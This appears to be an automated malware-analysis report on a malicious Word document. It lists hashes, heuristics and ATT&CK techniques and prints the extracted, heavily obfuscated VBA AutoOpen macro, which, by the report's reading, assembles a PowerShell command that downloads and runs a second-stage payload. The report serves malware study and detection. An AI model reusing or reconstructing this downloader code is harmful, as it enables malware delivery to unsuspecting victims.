Office (OLE) malware analysis — malicious · d70c68d2b293eb4a

MALICIOUS

Office (OLE)

91.2 KB Created: 2018-08-20 23:15:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 306d2aafe97a7d71c9094a16a9898dad SHA-1: 1185ab140990ff436d2f657b69a3263eee6c91ca SHA-256: d70c68d2b293eb4afd73dd4ee4bf3e01efe6189eb6d4ec2ad23bea67587a12ec

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing a VBA macro, indicated by the OLE_VBA_MACROS and OLE_VBA_AUTOOPEN heuristics. The macro appears to be obfuscated but contains strings that, when reconstructed, suggest it attempts to execute a PowerShell command. This is likely intended to download and run a second-stage payload, a common technique for malware delivery.

Heuristics 5

ClamAV: Doc.Malware.Generic-6665590-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6665590-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43329 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	43329 bytes
SHA-256: `2bfc4de85498b0873e23d28a80e1d218bc3a9926453dcb300006c04b703ccb92`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "EzzcOWXo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zNfsPVjQYIuTH" Function TSijcE() On Error Resume Next VarType Round(47782 / UiDBpz) IsArray 73757 / anEjSz FCRjqN = "Md " + "/V^" + ":^oN^ ^" + " ^ ^ /" + "r " + CStr(Chr(ArrJmjcp + FsiPLLNMBD + 34 + PtZzsvZqT + MHZJlmpiWKqzf)) + " " + " Se" + "^T" + " R^4" + "=p" VarType CDate(rZdMbD) VarType 74346 + TEazl - 31026 + diNsu VarType Val(HzPfk) zLfdnj = "^o" + "w^e" + "rs^" + "h^" + "e" + "/" + "/^ (e^ " + "^J^A" + "B" + "SAGg" + "AUA^A" + "^" wwzGn = 31602 * QkVtk VarType 98614 * vvfoOu * 7304 + rbaJM njnBwMfIiri = "9^" + "A^G^4A^" + "Z_" + "^B^3ACy" + "A" + "^b^w" + "^BiA" + "^G^o^A" + "^Z^_B" + "^jA:^_" + "^" + "A^" + "IA^" IsArray CDec(190) VarType CVar(73650 + WsthLd) IsArray Sqr(59) GRRMEh = "B^O^" + "A^GU^" + "Ad^A^" + "A^u^AFc" + "^A^Z^" + "_^Bi^A^" + "E^" + "MAb^A^" + "B" + "^p" + "A" + "^G^UA" + "bg^By" IsArray CDbl(379021379) Ewdwo = "^" + "A^D^" + "s" + "^A^JA^B" + "vAG" + "_^A_" + "^wA^9" + "^ACc" + "^A" + "^aA" + "By^A^:" + "_^AcA^" + "A^6" IsArray FCrVnM * zhbwuO - 60031 + jIaShz IsArray 15204 / bjilo * KruMY / 87252 IsArray wPBRUc * NQIUY - 44598 - mwlaaS wwzGn = CYAHFK - LRUzfd fTzoHYDGEAi = "AC^8ALw" + "^BwAG^" + "M" + "^Acg" + "BjAG" + "^g^" + "Ab" + "^w^B^h^" + "AC^4" + "^A^" + "b^w" + "B,^A" wwzGn = LwufMq - FKSai VarType 48469 * pScdk VarType HVINhl / HPvVch / Wazqz - kprkJF NizYLWU = "GcA" + "^LwBO" + "AF^" + "U^" + "A" + "UABA^" + "A" + "G^g" + "AdA" + "B^y^" IsArray 30497 / QVtLaB wwzGn = Tan(52936 * HLKRd * EcVTv / BqQqo) IijDTQqSrsw = "A" + "^:A^A^" + "O^gAv^" + "AC8" + "A#_B" + "n^A^G" + "U^AbgB" + "^i" + "^A" + "^G^w^A" + "^#" + "_^" wwzGn = Sin(10444236) wwzGn = CByte(666) wwzGn = Log(8) zsNFAjPz = "Bj^AGsA" + "^agB" + "hA^G^" + "M^A^a" + "^wBz^A" + "GIAb^" + "w^B^" + "iAG^UA" + "^d^A^" + "A" IsArray lSwrbG + ApRVu wwzGn = NzINdw - cMmvHW wwzGn = CDec(rYAjA) uzQdUinPC = "^uAG4" + "A^Z^" + "_^By^AC" + "^8Ab_^B" + "_AE" + "A^A" + "a^" + "AByA:^" + "_Ac^A^" + "A^6^" + "A" + "C8^A" + "L^w^B^" wwzGn = Cos(4073) wwzGn = ibNoUo - uDaEmi wwzGn = CDate(29297 * oodRS) AnoKQnKUiS = "w^A" + "^G8Ac" + "g^" + "B^y^A^G" + "E^Ab" + "^" + "A^" + "B^" + "jAG8A" + "#_" VarType QQOSDL + WSUEi / cfnzbW * kaXidX wwzGn = 61556 - wTvHEf * 21698 - cHTtiT IPsWhIf = "Bj" + "A^G^g" + "^A^a^_" + "^B^u" + "^AG" + "c^A^Lg^" + "B/^A" + "^:^M^A" + "L^wBN" IsArray TimeValue(zavIYU) wwzGn = CVar(DzjBps + 61823) wwzGn = 52795 + vkNwS / mNmkPY * jajQAb SapXNLPN = "^A:^QA" + "_^w^BiA" + "G" + "Q^" + "A_^" + "wB#^" + "AGU" + "^A^" + "_" + "^AB^" + "o" + "A^:^_A" + "^d" TSijcE = FCRjqN + zLfdnj + njnBwMfIiri + GRRMEh + Ewdwo + fTzoHYDGEAi + NizYLWU + IijDTQqSrsw + zsNFAjPz + uzQdUinPC + AnoKQnKUiS + IPsWhIf + SapXNLPN wwzGn = 76191 - wHMCv IsArray 19173 / BjoldL End Function Function WDNRLWzLoP() On Error Resume Next IsArray jucAGZ - 14756 - odjLFO * qpiMOL KLPutUYzqi = "^A^B" + "^wA^Do" + "^AL" + "^" + "wAvA" + ":^o^A" + "^bw^At^" + "A:^IA" + "^#_" wwzGn = thjlph / vKhAoi IsArray Val(EXsXn) bQzJTEkCP = "B^Q^A^G" + "^" + "8^" + "A^b^_B" + "-^" + "A:^M" + "^A^b^A^" IsArray CBool(hbVMR) zhwriPvzj = "AuA^:A^" + "Ab^A^A" + "vA" + "GMAbw" + "B^t" + "A:A^A" + "b^w^Bu" + "^A" + "GUA" + "bg^By^A" + "^:^M" + "^A" + "L^w^B^" wwzGn = Hex(DjChL) VarType Str(QdmdYd) IsArray Sqr(dFXvih) QWtTZMfCqnY = "j^" + "A^G8^A" + "b^_B" + "^XA^" + ":A^AcgB" + "vA" + "^G#Ab^w" + "^" + "B^," + "^A^" IsArray CDec(473) VarType cVKwR * isEFH * 69442 * qNdwC iYkpv = "GyAc^w" + "Av^AGQ" + "^Ab^g^B" + "^jA" + "^" + "GwAd_B^" + "Q" + "A^GU" + "Ac" + "^w^AvA" + "EM^A" + "^" + "bgB^j" WDNRLWzLoP = KLPutUYzqi + bQzJTEkCP + zhwriPvzj + QWtTZMfCqnY + iYkpv wwzGn = Int(3736) wwzGn = Val(37321 + GwMWZ) IsArray dDkN ... (truncated)

SHA-256: 2bfc4de85498b0873e23d28a80e1d218bc3a9926453dcb300006c04b703ccb92

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "EzzcOWXo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zNfsPVjQYIuTH"
Function TSijcE()
On Error Resume Next
VarType Round(47782 / UiDBpz)
   IsArray 73757 / anEjSz
FCRjqN = "Md " + "/V^" + ":^oN^ ^" + " ^ ^ /" + "r " + CStr(Chr(ArrJmjcp + FsiPLLNMBD + 34 + PtZzsvZqT + MHZJlmpiWKqzf)) + " " + " Se" + "^T" + "    R^4" + "=p"
VarType CDate(rZdMbD)
   VarType 74346 + TEazl - 31026 + diNsu
   VarType Val(HzPfk)
zLfdnj = "^o" + "w^e" + "rs^" + "h^" + "e" + "/" + "/^ (e^ " + "^J^A" + "B" + "SAGg" + "AUA^A" + "^"
wwzGn = 31602 * QkVtk
   VarType 98614 * vvfoOu * 7304 + rbaJM
njnBwMfIiri = "9^" + "A^G^4A^" + "Z_" + "^B^3ACy" + "A" + "^b^w" + "^BiA" + "^G^o^A" + "^Z^_B" + "^jA:^_" + "^" + "A^" + "IA^"
IsArray CDec(190)
   VarType CVar(73650 + WsthLd)
   IsArray Sqr(59)
GRRMEh = "B^O^" + "A^GU^" + "Ad^A^" + "A^u^AFc" + "^A^Z^" + "_^Bi^A^" + "E^" + "MAb^A^" + "B" + "^p" + "A" + "^G^UA" + "bg^By"
IsArray CDbl(379021379)
Ewdwo = "^" + "A^D^" + "s" + "^A^JA^B" + "vAG" + "_^A_" + "^wA^9" + "^ACc" + "^A" + "^aA" + "By^A^:" + "_^AcA^" + "A^6"
IsArray FCrVnM * zhbwuO - 60031 + jIaShz
   IsArray 15204 / bjilo * KruMY / 87252
   IsArray wPBRUc * NQIUY - 44598 - mwlaaS
   wwzGn = CYAHFK - LRUzfd
fTzoHYDGEAi = "AC^8ALw" + "^BwAG^" + "M" + "^Acg" + "BjAG" + "^g^" + "Ab" + "^w^B^h^" + "AC^4" + "^A^" + "b^w" + "B,^A"
wwzGn = LwufMq - FKSai
   VarType 48469 * pScdk
   VarType HVINhl / HPvVch / Wazqz - kprkJF
NizYLWU = "GcA" + "^LwBO" + "AF^" + "U^" + "A" + "UABA^" + "A" + "G^g" + "AdA" + "B^y^"
IsArray 30497 / QVtLaB
   wwzGn = Tan(52936 * HLKRd * EcVTv / BqQqo)
IijDTQqSrsw = "A" + "^:A^A^" + "O^gAv^" + "AC8" + "A#_B" + "n^A^G" + "U^AbgB" + "^i" + "^A" + "^G^w^A" + "^#" + "_^"
wwzGn = Sin(10444236)
   wwzGn = CByte(666)
   wwzGn = Log(8)
zsNFAjPz = "Bj^AGsA" + "^agB" + "hA^G^" + "M^A^a" + "^wBz^A" + "GIAb^" + "w^B^" + "iAG^UA" + "^d^A^" + "A"
IsArray lSwrbG + ApRVu
   wwzGn = NzINdw - cMmvHW
   wwzGn = CDec(rYAjA)
uzQdUinPC = "^uAG4" + "A^Z^" + "_^By^AC" + "^8Ab_^B" + "_AE" + "A^A" + "a^" + "AByA:^" + "_Ac^A^" + "A^6^" + "A" + "C8^A" + "L^w^B^"
wwzGn = Cos(4073)
   wwzGn = ibNoUo - uDaEmi
   wwzGn = CDate(29297 * oodRS)
AnoKQnKUiS = "w^A" + "^G8Ac" + "g^" + "B^y^A^G" + "E^Ab" + "^" + "A^" + "B^" + "jAG8A" + "#_"
VarType QQOSDL + WSUEi / cfnzbW * kaXidX
   wwzGn = 61556 - wTvHEf * 21698 - cHTtiT
IPsWhIf = "Bj" + "A^G^g" + "^A^a^_" + "^B^u" + "^AG" + "c^A^Lg^" + "B/^A" + "^:^M^A" + "L^wBN"
IsArray TimeValue(zavIYU)
   wwzGn = CVar(DzjBps + 61823)
   wwzGn = 52795 + vkNwS / mNmkPY * jajQAb
SapXNLPN = "^A:^QA" + "_^w^BiA" + "G" + "Q^" + "A_^" + "wB#^" + "AGU" + "^A^" + "_" + "^AB^" + "o" + "A^:^_A" + "^d"
TSijcE = FCRjqN + zLfdnj + njnBwMfIiri + GRRMEh + Ewdwo + fTzoHYDGEAi + NizYLWU + IijDTQqSrsw + zsNFAjPz + uzQdUinPC + AnoKQnKUiS + IPsWhIf + SapXNLPN
   wwzGn = 76191 - wHMCv
   IsArray 19173 / BjoldL
End Function
Function WDNRLWzLoP()
On Error Resume Next
IsArray jucAGZ - 14756 - odjLFO * qpiMOL
KLPutUYzqi = "^A^B" + "^wA^Do" + "^AL" + "^" + "wAvA" + ":^o^A" + "^bw^At^" + "A:^IA" + "^#_"
wwzGn = thjlph / vKhAoi
   IsArray Val(EXsXn)
bQzJTEkCP = "B^Q^A^G" + "^" + "8^" + "A^b^_B" + "-^" + "A:^M" + "^A^b^A^"
IsArray CBool(hbVMR)
zhwriPvzj = "AuA^:A^" + "Ab^A^A" + "vA" + "GMAbw" + "B^t" + "A:A^A" + "b^w^Bu" + "^A" + "GUA" + "bg^By^A" + "^:^M" + "^A" + "L^w^B^"
wwzGn = Hex(DjChL)
   VarType Str(QdmdYd)
   IsArray Sqr(dFXvih)
QWtTZMfCqnY = "j^" + "A^G8^A" + "b^_B" + "^XA^" + ":A^AcgB" + "vA" + "^G#Ab^w" + "^" + "B^," + "^A^"
IsArray CDec(473)
   VarType cVKwR * isEFH * 69442 * qNdwC
iYkpv = "GyAc^w" + "Av^AGQ" + "^Ab^g^B" + "^jA" + "^" + "GwAd_B^" + "Q" + "A^GU" + "Ac" + "^w^AvA" + "EM^A" + "^" + "bgB^j"
WDNRLWzLoP = KLPutUYzqi + bQzJTEkCP + zhwriPvzj + QWtTZMfCqnY + iYkpv
   wwzGn = Int(3736)
   wwzGn = Val(37321 + GwMWZ)
   IsArray dDkN
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.